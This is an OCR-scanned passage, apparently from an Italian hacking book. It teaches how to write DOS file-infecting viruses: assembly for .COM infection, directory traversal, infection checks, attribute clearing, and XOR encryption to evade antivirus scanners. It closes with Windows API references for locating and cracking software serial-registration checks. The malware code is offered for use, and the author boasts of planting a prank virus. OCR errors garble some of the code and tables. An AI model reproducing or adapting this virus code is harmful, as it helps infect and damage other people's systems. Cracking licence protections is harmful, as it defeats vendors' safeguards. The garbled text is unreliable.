Noosoosno no sui 


Questo codice assume che P1 sia allocato appena prima di V2 This code assumes 
that P1 is located just before V2, come in: 


P1_Stored_Here: 


V2_Start: 


E’ anche dato per scontato che ES sia uguale a CS. 
Se questo è falso cambiamo il codice relativo. 
Questo è un esempio: 


PUSH CS i Store CS 
POP ES j and move it to ES 
; Note MOV ES, CS is not a valid instruction 
MOV SI, P1 START ; 
MOV DI, 0100h z 
MOV CX, V1_ LENGTH 
REP MOVSB 


Move from whereever P1 is stored 
to CS:[100h] 


MOV DI, 0100h 
JMP DI 


Questo codice prima muove CS in ES e quindi setta il puntatore sorgente di MOVSB 
a dove P1 è piazzato. 


Ricordatevi che tutto è riferito alla in memoria dove è locato P1 e non è 
relativo ad un file fisico. 

L'offset di P1 è di 100h maggiore della locazione del file fisico il quale, come 
un .COM, è letto partendo dalla locazione 100h (CS:100h). 

Questo è un riassunto delle parti del virus e delle etichette 


Vi1_Start: 

JMP FAR PTR Duh 
Duh DW V2_Start 
V1_End: 


P2_Start: 
P2_End: 


P1_Start: 
; First part of the program stored here for future use 
P1_End: 


V2_Start: 
; Real Stuff 
V2_End: 


V1 Length EQU V1_End - V1_ Start 
Alternativamente potete salvare P1 in V2 come segue: 
V2_Start: 


P1_Start: 
P1_End: 


V2_End: 


Questo è quanto si deve fare per infettare un file senza distruggerlo. 

I file .EXE essendo segmentati e quindi con headers di testa e altre cosine, 
sono un pò più complessi. 

Torniamo indietro alla parte del replicatore. 

I passi sono i seguenti 


1) Trovare il file 

2) Testare se è da infettare 

3) Infettarlo 

4) Se infettato sufficientemente STOP 
5) Altrimenti ritorna a 1 


Dopo aver trovato il file lo si apre, si leggono i primi bytes e si controlla se 
corrispondono ai primi di V1. 

Se esiste questa corrispondenza allora significa che il file è già infettato. 

E importante che non venga intfettato nuvamente lo stesso file. 

Questo è dato dal fatto che in genere un parte del codice viene aggiunta al file 
per cui se si continuasse a controllare il file e se si continuasse ad 
aggiungere in coda il resto 

Se il file non è infettato 


1) Cambiate gli attributi del file a NULL (resettateli). 

2) Salvate la data e il tempo del file. 

3) Chiudetelo 

4) Apritelo in modo READ/WRITE 

5) Salvate P1 e appendetelo alloa fine del file 

6) Copiate V1 all’inizio ma cambiate l’offset a cui salta per trasferirgli il 
controllo in modo corretto. Guardate la parte di codice precedente. 

) Appendete V2 alla fine del file 

8) Eseguite il restore dei file attributes/date/time. 


Tra le altre cose, delle quali abbiamo già visto qulche cosa, ci sono 
Una voce da aggiungere è la seguente. 


Cancellazione delle tracce 


Questo viene definito in gergo (in inglese) CONCEALER ed è quella parte che 
nasconde alla vista degli scanner antivirus il nostro ospite. 

Il metodo più semplice è quello del codificatore. 

Il codice per un semplice codificatore a XOR è 


encrypt_val db ? 
decrypt: 
encrypt: 
mov ah, encrypt_val 


mov cx, part_to_encrypt_end - part_to_encrypt_start 
mov si, part_to_encrypt_start 
mov di, si 


xor_loop: 
lodsb ; DS:[SI] - AL 
xor al, ah 
stosb ; AL - ES:[DI] 
loop xor_loop 
ret 


Notate che il codificatore e il decodificatore sono gli stessi. 

Potete chiamare la procedura da dovunque nel programma ma siate sicuri di non 
chiamarla da una parte che deve essere codificata se non tutto si pianterà. 
Quindi scrivete il virus, settate il valore di codifica a 0. 
part_to_encrypt_start e part_to_encrypt_end contengono l’area che deve essere 
codificata. 

Usate una CALL decrypt all’inizio di V2 per codificare il file e quindi 
eseguite il programma. 

Qando si infetta un file, per prima cosa cambiate il valore di encrypt_val, 
quindi eseguite la CALL encrypt, e dopo scrivete V2 alla fine del file, e dopo 
ancora eseguite la CALL decrypt. 

Ricordo nuovamente di non eseguire la chiamata da un punto che deve essere 
codificato. 

Questo è quanto V2 mostra con il NASCONDITORE (concealer): 


V2_Start: 
Concealer_Start: 


Concealer_End: 


Replicator_Start: 


Replicator_End: 


Part_To_Encrypt_Start: 


Part_To_Encrypt_End: 
V2_End: 


Alternativamente potete muovere una parte non codificata compressa tra 
Part_To_Encrypt_End e V2_End. 

La codifica rende la vita difficile agli scanner. 

Essa nasconde anche alcune stringhe presenti nel vostro programma. 

La codifica è solo un metodo per nascondere il virus ed inoltre potrebbe 
disporre di varianti. 

Un altro metodo è quello di cambiare gli interrupts in modo che alcuni risultati 
vengano modificati e che comunque modifichino il comportamento di certi comandi 
e utilities. 

La perte BOMBA del virus ovvero la parte che mostra al mondo la propria 
esistenza varia a seconda della vostra fantasia. 

Io anni fà odiavo DB3 perchè per me i programmatori DB3 erano ‘Mangiatori di 
Cioccorì”’. 

Un virus analizzava gli input e se uno cercava di inserire l'estensione DBF ad 
un file il virus gli cambiava, mentre lui scriveva, una lettera dell'estensione 
per cui gli veniva xxx.DCF, xxxx.DBH e dopo 10 volte lo avvertiva che per motivi 
di orgoglio il sistema si rifiutava di usare volgari files .dbf. 

Beh! Pensate a quante cose potrebbero sorgere nella VOSTRA (non nella mia) MENTE 
MALATA E PERVERSA!! 

Una cosa che mi è accaduta grazie ad un virus che ve la voglio raccontare è la 
seguente. 

Tanti anni fa, nel 1984, insegnavo informatica in un istituto. 

Iniziai nel 1984 con il BASIC e nel 1986 cambiai l’indirizzo del corso con il 
LINGUAGGIO C. 

L'aula di laboratorio era il fiore all'occhiello per gli istituti di un tempo 
per cui quando veniva una personalità in visita il preside lo accompagnava, 
orgoglioso, a vedere questa classe. 

Il corso era frequentato da persone di circa 23-24 anni di sesso maschile e 
femminile. 

Un anno fu frquentato da alcune ragazze NOTEVOLI una delle quali faceva 
l’indossatrice di biancheria intima (per farvi capire ...). 

Ebbi un idea geniale. 

Feci un virus che una volta installato a tempi random faceva comparire sul video 
un immagine di du4e che si davano ‘DUE COLPETTI’ e poi sparivano. 

In pratica tu lavoravi con quello che volevi e di colpo 
‘SU...GIU...SU...GIU...VIAAA' e tutto spariva. 

Venne in visita il vescovo di una nota citta della Sicilia e il preside lo 
accompagno a vedere l’aula. 

Appena entrato si apposto alle spalle di una di queste belle rampolle e si mise 
ad osservare il lavoro che stavano svolgendo, con a fianco il preside che era 
tutto gonfio e pavoneggiante. 

Di colpo ... SU....GIU....SU....GIU , tanto rapidamente che il vescovo disse 
solo : ‘Opps ... che è stato ... ho visto un nuvoletta che è apparsa e che è 
subito andata via...’. 

Il preside che invece aveva avuto il tempo di capire di cosa si trattasse passo 
dal sorriso smagliante ad un espressione terrorizzata e il suo clore passo tutta 
la tavolozza dei 16 milioni di colori anche se quel tempo c’era solo la CGI con 
256 colori. 

Prese sottobraccio il vescovo e con una scusa lo portò via di li. 

Quando torno se la prese con tutti gli alunni e devo confessare di essere stato 
super-stronzo per non aver avuto il coraggio di dirgli che lo avevo fatto io. 
Se lo avessi confessato sarei stato leale ma questo mio aspetto di lealtà 
sarebbe stato slo riportato sulla mia lapide in qanto non penso che sarei 
soppravissuto all’impatto. 

Questo è quello che si definisce con il BOMB di un virus !! 

Per BOMB quindi si intende quello che fa il virius comparendo (e magari quella 
che vi infilano in un orecchio per non dire da qualche altra parte se vi 
pescano). 

Quella che viene definita come DISTRIBUTION è quell’altra parte della 
propagazione del virus ovvero quel supporto che volete usare per divulgarlo. 
Tutti questi virus eseguono il loro lavoro attraverso il sistema. 

Questi rendono 


Una delle cose da fare inizialmente è legata alla ricerca del file da utilizzare 
per l’inserimento del codice. 

Il seguente programma in assembler ezsegue la ricerca trasversale nelle 
directory del sistema. 

Il codice è una versione modificata del The Funky Bob Ross Virus [Beta]. 


traverse _fcn proc near 


push bp ; Create stack frame 
mov bp,sp sub sp,44 ; Allocate space for DTA 
call infect_directory ; Go to search & destroy routines 
mov ah,1Ah ;Set DTA 
lea dx,word ptr [bp-44] ; to space allotted 
int 21h ;Do it now! 
mov ah, 4Eh ;Find first 
MOV Cx,16 ;Directory mask 
lea dx,[si+toffset dir_mask] ; *.* int 21h 
jmp short isdirok 
gonow: 
cmp byte ptr [bp-14], '.' ; Is first char == '.'? 
je short donext i If so, loop again 
lea dx,word ptr [bp-14] ; else load dirname 
mov ah,3Bh ; and changedir there 
int 21h 
jc short donext ; Do next if invalid 
inc word ptr [si+toffset nest] ; nestt+ 
call near ptr traverse_fcn ; recurse directory 
donext: 
lea dx,word ptr [bp-44] ; Load space allocated for DTA 
mov ah,1Ah ; and set DTA to this new area 
int 21h 'cause it might have changed 
mov ah,4Fh ‘Find next int 21h 
isdirok: 
jnc gonow If OK, jmp elsewhere 
cmp word ptr [si+offset nest], If root directory ; (nest == 0) 
jle short cleanup then Quit 


Else decrement nest 


dec word ptr [si+toffset nest] 
lea dx, [si+toffset back dir] 
mov ah,3Bh 
int 21h 
cleanup: 
mov sp,bp 
pop bp 
ret 
traverse_fcn endp 


Change directory 
to previous one 


Novo 8 8 8 Si 


j Variables 


nest dw 0 
back_dir db '..',0 
dir_mask db '*.*',0 


La seguente aggiunta permette di tornare indietro di una directory ed di 
ripetere l’operazione di controllo nel caso in cui non si sia trovato il numero 
voluto di programmi da usare come vettori del codice. 


dir_loopy: 
call infect_directory 
lea dx, [bp+dotdot] 
mov ah, 3bh ; CHDIR 
int 21h jnc dir_loopy ; Carry set if in root 
; Variables 
dotdot db '..',0 


La funzione infect_directory utilizza i metodi FINDFIRST e FINDNEXT per la 
ricerca dei files. 

Quando viene trovato un file bisogna settare un nuovo DTA e non utilizzare il 
DTA presente nel PSP dato che il programma attivandolo se ne accorgerebbe. 

La funzione dell’INT 21h (Set DTA) serve allo scopo 


mov ah, 1Ah j Set DTA 
lea dx, [bp+offset DTA] ; to variable called DTA (wow!) 
int 21h 


A questo punto si inzia con la procedura del FINFIRST e FINDNEXT. 


mov ah, 4Eh ; Find first file 

mov cx, 0007h ; Any file attribute 
lea dx, [bp+toffset file mask] ; DS:[DX] -- filemask 
int 21h 


jc none_found 
found_another: 
call check_infection 
mov ah, 4Fh ; Find next file 
int 21h 
jnc found_another 
none_found: 


Invece di cercare prima i .EXE e dopo i .COM è sufficiente ricercare *.* e poi 
controllare se l’estensione è una di quelle volute. 


Un sistema prudente cerca di non infettare files che verrebbero controllati 
facilmente come ad esempio il COMMAND.COM. 

Se si controlla i primi due byte e si trova ‘ND’ allora il file è appunto il 
command.com 


cmp word ptr [bp+offset DTA+35], 'DN' ; Reverse word order 
jz fail_check 


Un altra procedure che il programma dovrà attivare è legata al fatto di dover 
controllare se il file trovato è già stato infettato dal programma. 

Per fare questo normalmente ci si supporta su certi pezzi di codice che sono 
presenti nel programma. 


mov ah,3Fh ; Read first three 

mov cx, 3 ; bytes of the file 

lea dx, [bp+offset buffer] ; to the buffer 
int 21h 

mov ax, 4202h ; SEEK from EOF 

XOr CX, CX j; DX:CX = offset 

xor dx, dx ; Returns filesize 

int 21h ; in DX:AX 

sub ax, virus_size + 3 

cmp word ptr [bp+offset buffer+1], ax 
jnz infect_it 


bomb_out: 


mov ah, 3Eh ; else close the file 
int 21h ; and go find another 


In questo esempio si suppone che BX contenga l’handle del file e che virus_size 
sia la dimensione del virus. 

In pratica vengono letti i primi tre bytes e dopo il controllo viene eseguito un 
salto. 


mov ah, 3Fh ; Read the first four 

mov cx, 4 ; bytes of the file into 

lea dx, [bp+offset buffer] ; the buffer. 

int 21h 

cmp byte ptr [buffer+3], infection_id byte ; Check the fourth 
jz bomb_out ; byte for the marker 


infect_it: 


La parte fondamentale del programma è il replicatore. 

Dopo aver trovato un file idoneo è necessario salvare gli attributi di questo 
come data, ora e dimensioni per un uso successivo. 

Il seguente è uno spaccato del DTA. 


Offset size What it is 

oh 21 BYTES Reserved, varies as per DOS version 
15h BYTE File attribute 

16h WORD File time 

18h WORD File date 

1Ah DWORD File size 

1Eh 13 BYTES ASCIIZ filename + extension 


Il seguente codice salva le informazioni dal DTA. 


lea si, [bp+offset DTA+15h] ; Start from attributes 
mov cx, 9 ; Finish with size 

lea di, [bp+offset f_attr] ; Move into your locations 
rep movsb 


; Variables needed 


f_attr db 
f_time dw 
f_date dw 
f_size dd 


NUO 


Ora è possibile cambiare gli attributi tramite INT 21h/Function 43h/Subfunction 
01h. 
Questo è per permettere l'infezione di file nascosti, di sistema e read only. 


lea dx, [bp+offset DTA+1eh] ; DX points to filename in 
mov ax, 4301h ; DTA 

XOr CX, CX ; Clear file attributes 

int 21h ; Issue the call 


A questo punto è possibile aprire il file e usare l’handle per lettura e 
scrittura. 


lea dx, [bp+offset DTA+1eh] ; Use filename in DTA 
mov ax, 3d02h ; Open read/write mode 


int 21h j duh. 
xchg ax, bx ; Handle is more useful in ù 
; BX 


Ed ora il codice per cui si è lavorato fino ad ora ovvero quello per infettare. 
Quello che segue riguarda i files .COM 


; Sample COM infector. Assumes BX holds the file handle 
; Assume COM file passes infection criteria and not already infected 


mov ah, 3fh 
lea dx, [bp+buffer1] 
MOV CX, 3 


int 21h 

mov ax, 4200h ; Move file pointer to 

XOr Cx, Cx ; the beginning of the 

xor dx, dx ; file 

int 21h 

mov byte ptr [bp+buffer2], 0e9h ; JMP 

mov ax, word ptr [bp+f_size] 

sub ax, parti size ; Usually 3 

mov word ptr [bp+buffer2+1], ax ; offset of JMP 


; Encode JMP instruction to replace beginning of the file 


mov byte ptr [bp+buffer2], 0e9h ; JMP 

mov ax, word ptr [bp+f_size] 

sub ax, parti size ; Usually 3 

mov word ptr [bp+buffer2+1], ax ; offset of JMP 


; Write the JMP instruction to the beginning of the file 


mov ah, 40h ; Write CX bytes to 

mov cx, 3 ; handle in BX from 

lea dx, [bp+buffer2] ; buffer - DS:[DX] 

int 21h 

mov ax, 4202h ; Move file pointer to 

XOr Cx, Cx ; end of file 

xor dx, dx 

int 21h 

mov ah, 40h ; Write CX bytes 

mov cx, endofvirus - startofpart2 ; Effective size of virus 
lea dx, [bp+startofpart2] ; Begin write at start 
int 21h ; Variables buffer1 


db 3 dup (?) i Saved bytes from the 
; infected file to restore 
; later buffer2 

db 3 dup (?) ; Temp buffer 


Per i .EXE bisogna prima vedere un attimo di teoria. 
Quello che segue è 1’ header di un file .EXE 


ofs Name size Comments 

00 Signature bytes always 4Dh 5Ah (MZ) 
*02 Last Page Size 
*04 File Pages 

06 Reloc Items 

08 Header Paras 

0A MinAlloc 

OC MaxAlloc 

*0E PreReloc SS 

*10 Initial SP 

12 Negative checksum 


word number of 512 byte pages 


word starting SP value 
word currently ignored 


NPPPHPPPFEFFRFEFEKEEN 
= 
>) 
= 
Q 


*14 Pre Reloc IP word execution start address 

*16 Pre Reloc CS word preadjusted start segment 

18 Reloc table offset word is offset from start of file) 
1A Overlay number word ignored if not overlay 

1C Reserved/unused words 


e sono quelli cambiati dal virus 


word number of bytes in last page 


word number of entries in table 

word size of header in 16 byte paras 
word minimum memory required in paras 
word maximum memory wanted in paras 
offset in paras to stack segment 


Per capire il tutto bisogna pensare che il file .EXE è strutturato in segmenti. 


Questi segmenti possono iniziare e finire ovunque. 
Quello che bisogna fare è attaccare il codice alla fine. 


API DI WINDOWS. 


La presente parte non vuole essere un manuale completo delle API di Windows 
visto il numero ragguardevole e quindi lo spazio che occuperebbero in numero di 
pagine. 

Inoltre non è lo scopo di questo volume insegnare la programmazione in ambiente 
Windows ma solo quello di indicare quali funzioni potrebbero essere quelle 
utilizzate, e quindi da intercettare, nel caso di protezioni. 

Abbiamo visto prima che alcune volte funzioni come GetDlgItemText, 
GetDlgItemInt, GetWindowText ecc. erano quelle ricercate al fine di comprendere 
dove si trovavano le routines che eseguivano le richieste delle stringhe 
relative ai codici. 

Altre volte il codice relativo alle funzioni di gestione delle serializzazioni 
sono più complesse, per volere dei progettisti, per cui l’individuazione dei 
moduli veri e propri risulta essere più complessa, raggiungibile soltanto 
mediante la ricerca di altre funzioni come ad esempio quelle che leggono e 
scrivono informazioni dentro al file di registro. 

Avrete notato che alcune volte caricando dei programmi per la prima volta vi 
veniva richiesto il numero di serie. 

Se per qualche motivo vi capitava di dover eliminare dal disco quel programma e 
poi rinserirlo avrete notato che i codici di attivazione non vi venivano più 
richiesti. 

Le informazioni inserite la prima volta sicuramente venivano salvate da qualche 
parte e precisamente nel file di registro. 

Le funzioni che eseguono funzionalità su questo possono essere dei buoni 
obbiettivi per identificare certi moduli. 

Nelle seguenti pagine riporto un elenco delle funzioni API più facilmente 
utilizzate nei moduli di cui stiamo parlando. 

Come al solito le informazioni provengono da files freeware trovati su Internet. 
Come ho detto all’inizio non si tratta di tutte le funzioni ma solo di quelle 
che potrebbero essere utilizzate nei moduli di registrazione. 

Le funzioni spesso sono le più svariate. 

Alcune volte ad esempio viene richiesto che l’installazione avvenga dal CD per 
cui le API potrebbero essere quelle legate al controllo dei dischi quali 
GetDriveTypeA oppure GetVolumeInformation. 

Altre volte potrebbero essere funzioni legate alla lettura di campi come ad 
esempio GetDlgItemTextA ecc. 

Insomma. 

Le funzioni elencate sono quelle maggiormente utilizzate per i nostri obiettivi. 
Ricordatevi che queste API vengono importate dal programma e a ciascuna gli 
viene assegnato un indirizzo. 

SoftIce o Wdasm vi mostrano in forma simbolica i nomi per cui le ricerche 
avvengono per nome vero e proprio. 

Gli argomenti potrete ricavarli dalle informazioni riportate. 

Dimenticavo che spesso possiamo ricercare le classiche funzioni di libreria del 
C destinate alla manipolazione di stringhe come ad esempio _lstrcemp o _lstrlen. 
Queste possono essere usate per comparare due stringhe, per valutare la 
lunghezza ecc. 

C'è anche da tenere sempre presente che le funzioni sono anche relative al 
linguaggio usato per la creazione delle procedure di timelock. 

Alcune volte il programmatore che ha scritto il programma ha ideato ed 
implementato anche le routine di serializzazione. 

In questo caso sicuramente le funzioni usate in tali routine sono nello stesso 
linguaggio del resto del programma. 

Esistono software commerciali che permettono l’aggiunta di routine per la 
gestione dei demo in file eseguibili. 

Programmi seri come quelli di Symantec, Macromedia ecc. usano programmi 
commerciali per le loro versioni demo. 

Questi sono casi a parte in quanto essendo fatti su misura per queste funzioni 
utilizzano metodi “molto” professionali legati ad algoritmi di crittografia ecc. 


Se le funzioni di serializzazione sono scritte nello stesso linguaggio del 
programma allora si tratterà di identificare quale è in quanto le funzioni da 
cercare saranno relative a questo. 

Supponiamo di cercare la funzione che fa comparire una dialog che avvisa che il 
codice è errato di un programma scritto in C. 

In questo caso, lo abbiamo già visto, dovremmo cercare una MessageBox. 

Se il programma è scritto in Delphi allora il nome della funzione potrebbe 
essere ShowMessage() o MessageDlg(). 

Se i linguaggi si supportano sulle DLL di Windows alla fine utilizzeranno le 
seguenti API. 

Infatti è possibile vedere le 
visualbasic, delphi ecc.) 

Il seguente spezzone di lista mostra alcune funzioni importate da VisualBasic: 


funzioni importate dei vari RUNTIME (di 


Imported functions : c:\Windows\VBRUN300.DLL 


GDI 1 SETBKCOLOR GDI 83 GETPIXEL 

GDI 2 SETBKMODE GDI 85 GETROP2 

GDI 3 SETMAPMODE GDI 87 GETSTOCKOBJECT 
GDI 4 SETROP2 GDI 91 GETTEXTEXTENT 
GDI 7 SETSTRETCHBLTMODE GDI 92 GETTEXTFACE 

GDI 9 SETTEXTCOLOR GDI 93 GETTEXTMETRICS 
GDI 11 SETWINDOWORG GDI 97 GETWINDOWORG 
GDI 13 SETVIEWPORTORG GDI 106 SETBITMAPBITS 
GDI 14 SETVIEWPORTEXT GDI 127 DELETEMETAFILE 
GDI 15 OFFSETWINDOWORG GDI 148 SETBRUSHORG 

GDI 19 LINETO GDI 150 UNREALIZEOBJECT 
GDI 20 MOVETO GDI 151 COPYMETAFILE 
GDI 21 EXCLUDECLIPRECT GDI 153 CREATEIC 

GDI 22 INTERSECTCLIPRECT GDI 154 GETNEARESTCOLOR 
GDI 23 ARC GDI 159 GETMETAFILEBITS 
GDI 24 ELLIPSE GDI 160 SETMETAFILEBITS 
GDI 26 PIE GDI 172 SETRECTRGN 

GDI 27 RECTANGLE GDI 175 ENUMMETAFILE 
GDI 28 ROUNDRECT GDI 176 PLAYMETAFILERECORD 
GDI 29 PATBLT GDI 351 EXTTEXTOUT 

GDI 30 SAVEDC GDI 360 CREATEPALETTE 
GDI 34 BITBLT GDI 363 GETPALETTEENTRIES 
GDI 35 STRETCHBLT GDI 439 STRETCHDIBITS 
GDI 38 ESCAPE GDI 440 SETDIBITS 

GDI 39 RESTOREDC GDI 441 GETDIBITS 

GDI 45 SELECTOBJECT GDI 442 CREATEDIBITMAP 
GDI 47 COMBINERGN KERNEL 1 FATALEXIT 

GDI 48 CREATEBITMAP KERNEL 3 GETVERSION 

GDI 50 CREATEBRUSHINDIRECT KERNEL 4 LOCALINIT 

GDI 51 CREATECOMPATIBLEBITMAP KERNEL 5 LOCALALLOC 

GDI 52 CREATECOMPATIBLEDC KERNEL 6 LOCALREALLOC 
GDI 53 CREATEDC KERNEL 7 LOCALFREE 

GDI 57 CREATEFONTINDIRECT KERNEL 8 LOCALLOCK 

GDI 58 CREATEHATCHBRUSH KERNEL 9 LOCALUNLOCK 

GDI 61 CREATEPEN KERNEL 10 LOCALSIZE 

GDI 62 CREATEPENINDIRECT KERNEL 15 GLOBALALLOC 

GDI 64 CREATERECTRGN KERNEL 16 GLOBALREALLOC 
GDI 66 CREATESOLIDBRUSH KERNEL 17 GLOBALFREE 

GDI 68 DELETEDC KERNEL 18 GLOBALLOCK 

GDI 69 DELETEOBJECT KERNEL 19 GLOBALUNLOCK 
GDI 70 ENUMFONTS KERNEL 20 GLOBALSIZE 

GDI 74 GETBITMAPBITS KERNEL 21 GLOBALHANDLE 
GDI 75 GETBKCOLOR KERNEL 22 GLOBALFLAGS 

GDI TT GETCLIPBOX KERNEL 23 LOCKSEGMENT 

GDI 80 GETDEVICECAPS KERNEL 24 UNLOCKSEGMENT 
GDI 82 GETOBJECT KERNEL 30 WAITEVENT 


KERNEL 
KERNEL 
KERNEL 
KERNEL 
KERNEL 
KERNEL 
KERNEL 
KERNEL 
KERNEL 
KERNEL 
KERNEL 
KERNEL 
KERNEL 
KERNEL 
KERNEL 
KERNEL 
KERNE 


GETCURRENTTASK 
GETCURRENTPDB 
FREEMODULE 
GETMODULEHANDLE 
GETMODULEFILENAME 
GETPROCADDRESS 
FREEPROCINSTANCE 
GETPROFILEINT 
GETPROFILESTRING 
FINDRESOURCE 
LOCKRESOURCE 
ACCESSRESOURCE 
SIZEOFRESOURCE 
OPENFILE 

_LCLOSE 

_LREAD 


_LLSEEK 


Per motivi di spazio la lista è stata troncata. 

Se volete ricostruirle relative ad ogni RunTime potete usare ScanBin sulle DLL 
tipo VBRUN400.DLL ecc. 

Il nome prima del numero e del nome della funzione è la DLL da cui proviene. 

I testi sono originali in lingua inglese per evitare mie interpretazioni errate. 


GetDlgItem 


The GetDlgItem function retrieves the handle of a control in the specified 
dialog box. 


HWND GetDlgItem( 


HWND hDlg, // handle of dialog box 
int nIDDlIgItem //identifier of control 


); 

Parameters 

hDlg 

Identifies the dialog box that contains the control. 

nIDDlgItem 

Specifies the identifier of the control to be retrieved. 

Return Values 

If the function succeeds, the return value is the window handle of the given 
control. 

If the function fails, the return value is NULL, indicating an invalid dialog 
box handle or a nonexistent control. 

Remarks 

You can use the GetDlgItem function with any parent-child window pair, not just 
with dialog boxes. As long as the hDlg parameter specifies a parent window and 
the child window has a unique identifier (as specified by the hMenu parameter in 
the CreateWindow or CreateWindowEx function that created the child window), 
*GetDlgItem returns a valid handle to the child window. 


See Also 


CreateWindow, CreateWindowEx, GetDlgItemInt, GetDlgItemText 
GetDlgItemInt 


The GetDlgItemInt function translates the text of a specified control in a 
dialog box into an integer value. 


UINT GetDlgItemInt( 


HWND hDlg, // handle to dialog box 

int nIDDlgItem, // control identifier 

BOOL *lpTranslated, // points to variable to receive success/failure indicator 
BOOL bSigned // specifies whether value is signed or unsigned 

); 

Parameters 

hDlg 


Handle to the dialog box that contains the control of interest. 


nIDDlgItem 


Dialog item identifier that specifies the control whose text is to be 
translated. 


lpTranslated 


Points to a Boolean variable that receives a function success/failure value. 
TRUE indicates success, FALSE indicates failure. 


This parameter is optional: it can be NULL. In that case, the function returns 
no information about success or failure. 


bSigned 


Specifies whether the function should examine the text for a minus sign at the 
beginning and return a signed integer value if it finds one. TRUE specifies that 
this should be done, FALSE that it should not. 


Return Values 


If the function succeeds, the variable pointed to by lpTranslated is set to 
TRUE, and the return value is the translated value of the control text. 


If the function fails, the variable pointed to by lpTranslated is set to FALSE, 
and the return value is zero. Note that, since zero is a possible translated 
value, a return value of zero does not by itself indicate failure. 


If lpTranslated is NULL, the function returns no information about success or 
failure. 


If the bSigned parameter is TRUE, specifying that the value to be retrieved is a 
signed integer value, cast the return value to an int type. 


Remarks 


The GetDlgItemInt function retrieves the text of the given control by sending 
the control a WM_GETTEXT message. The function translates the retrieved text by 
stripping any extra spaces at the beginning of the text and then converting the 
decimal digits. The function stops translating when it reaches the end of the 
text or encounters a nonnumeric character. 


If the bSigned parameter is TRUE, the GetDlgItemInt function checks for a minus 
sign (-) at the beginning of the text and translates the text into a signed 
integer value. Otherwise, the function creates an unsigned integer value. 


The GetDlgItemInt function returns zero if the translated value is greater than 
INT_MAX (for signed numbers) or UINT_MAX (for unsigned numbers). 


See Also 
GetDlgItem 
GetDlgItemText 


The GetDlgItemText function retrieves the title or text associated with a 
control in a dialog box. 


UINT GetDlgItemText( 
HWND hDlg, // handle of dialog box 
int nIDDlgItem, // identifier of control 


LPTSTR lpString, // address of buffer for text 
int nMaxCount // maximum size of string 


); 

Parameters 

hDlg 

Identifies the dialog box that contains the control. 

nIDDlgItem 

Specifies the identifier of the control whose title or text is to be retrieved. 
lpString 

Points to the buffer to receive the title or text. 

nMaxCount 

Specifies the maximum length, in characters, of the string to be copied to the 
buffer pointed to by lpString. If the length of the string exceeds the limit, 
the string is truncated. 


Return Values 


If the function succeeds, the return value specifies the number of characters 
copied to the buffer, not including the terminating null character. 


If the function fails, the return value is zero. 

Remarks 

The GetDlgItemText function sends a WM_GETTEXT message to the control. 
See Also 

GetDlgItemInt 

GetLocalTime 

The GetLocalTime function retrieves the current local date and time. 


VOID GetLocalTime( 
LPSYSTEMTIME lpSystemTime // address of system time structure 


); 

Parameters 

lpSystemTime 

Points to a SYSTEMTIME structure to receive the current local date and time. 
Return Values 

This function does not return a value. 

See Also 

GetSystemTime 


GetOpenFileName 


The GetOpenFileName function creates an Open common dialog box that lets the 
user specify the drive, directory, and the name of a file or set of files to 
open. 


BOOL GetOpenFileName ( 
LPOPENFILENAME lpofn // address of structure with initialization data 


di; 
Parameters 
lpofn 


Pointer to an OPENFILENAME structure that contains information used to 
initialize the dialog box. When GetOpenFileName returns, this structure contains 
information about the user's file selection. 


Return Values 


If the user specifies a filename and clicks the OK button, the return value is 
nonzero. The buffer pointed to by the lpstrFile member of the OPENFILENAME 
structure contains the full path and filename specified by the user. 


If the user cancels or closes the Open dialog box or an error occurs, the return 
value is zero. To get extended error information, call the CommDlgExtendedError 
function, which can return one of the following values: 


CDERR_FINDRESFAILURE 
CDERR_NOHINSTANCE 
CDERR_INITIALIZATION 
CDERR_NOHOOK 
CDERR_LOCKRESFAILURE 
CDERR_NOTEMPLATE 
CDERR_LOADRESFAILURE 
CDERR_STRUCTSIZE 
CDERR_LOADSTRFAILURE 
FNERR_BUFFERTOOSMALL 
CDERR_MEMALLOCFAILURE 
FNERR_INVALIDFILENAME 
CDERR_MEMLOCKFAILURE 
FNERR_SUBCLASSFAILURE 


Remarks 


By default, Windows 95 and Windows NT version 4.0 display a new version of the 
Open dialog box that provides user-interface features that are similar to the 
Windows Explorer. You can provide an OFNHookProc hook procedure for an Explorer- 
style Open dialog box. To enable the hook procedure, set the OFN_EXPLORER and 
OFN_ENABLEHOOK flags in the Flags member of the OPENFILENAME structure and 
specify the address of the hook procedure in the lpfnHook member. 

Windows 95 and Windows NT 4.0 continue to support the old-style Open dialog box 
for applications that want to maintain a user-interface consistent with the 
Windows 3.1 or Windows NT 3.51 user-interface. To display the old-style Open 
dialog box, enable an OFNHookProcOldStyle hook procedure and ensure that the 
OFN_EXPLORER flag is not set. 

GetPrivateProfileInt 


The GetPrivateProfileInt function retrieves an integer associated with a key in 
the specified section of the given initialization file. This function is 
provided for compatibility with 16-bit Windows-based applications. Win32-based 
applications should store initialization information in the registry. 


UINT GetPrivateProfileInt( 
LPCTSTR lpAppName, // address of section name 


LPCTSTR lpKeyName, // address of key name 
INT nDefault, // return value if key name is not found 


LPCTSTR lpFileName // address of initialization filename 
); 


Parameters 
lpAppName 


Points to a null-terminated string containing the section name in the 
initialization file. 


lpKeyName 

Points to the null-terminated string containing the key name whose value is to 
be retrieved. This value is in the form of a string; the GetPrivateProfileInt 
function converts the string into an integer and returns the integer. 

nDefault 

Specifies the default value to return if the key name cannot be found in the 
initialization file. 

lpFileName 

Points to a null-terminated string that names the initialization file. If this 
parameter does not contain a full path to the file, Windows searches for the 
file in the Windows directory. 

Return Values 

If the function succeeds, the return value is the integer equivalent of the 
string following the specified key name in the specified initialization file. If 
the key is not found, the return value is the specified default value. If the 
value of the key is less than zero, the return value is zero. 

Remarks 

The function searches the file for a key that matches the name specified by the 
lpKeyName parameter under the section name specified by the lpAppName parameter. 


A section in the initialization file must have the following form: 


[section] 
key=value 


The GetPrivateProfileInt function is not case-sensitive; the strings in 
lpAppName and lpKeyName can be a combination of uppercase and lowercase letters. 


An application can use the GetProfileInt function to retrieve an integer value 
from the WIN.INI file. 

Windows NT: 

Calls to private profile functions may be mapped to the registry instead of to 
the specified initialization files. This mapping occurs when the initialization 


file and section are specified in the registry under the following keys: 


HKEY_LOCAL_MACHINE\Software\Microsoft\ 


Windows NT\CurrentVersion\IniFileMapping 


This mapping is likely if an application modifies system-component 
initialization files, such as CONTROL.INI, SYSTEM.INI, and WINFILE.,INI. In these 
cases, the GetPrivateProfileInt function retrieves information from the 
registry, not from the initialization file; the change in the storage location 
has no effect on the function's behavior. 


The Win32 Profile functions (Get/WriteProfile*, Get/WritePrivateProfile*) use 
the following steps to locate initialization information: 


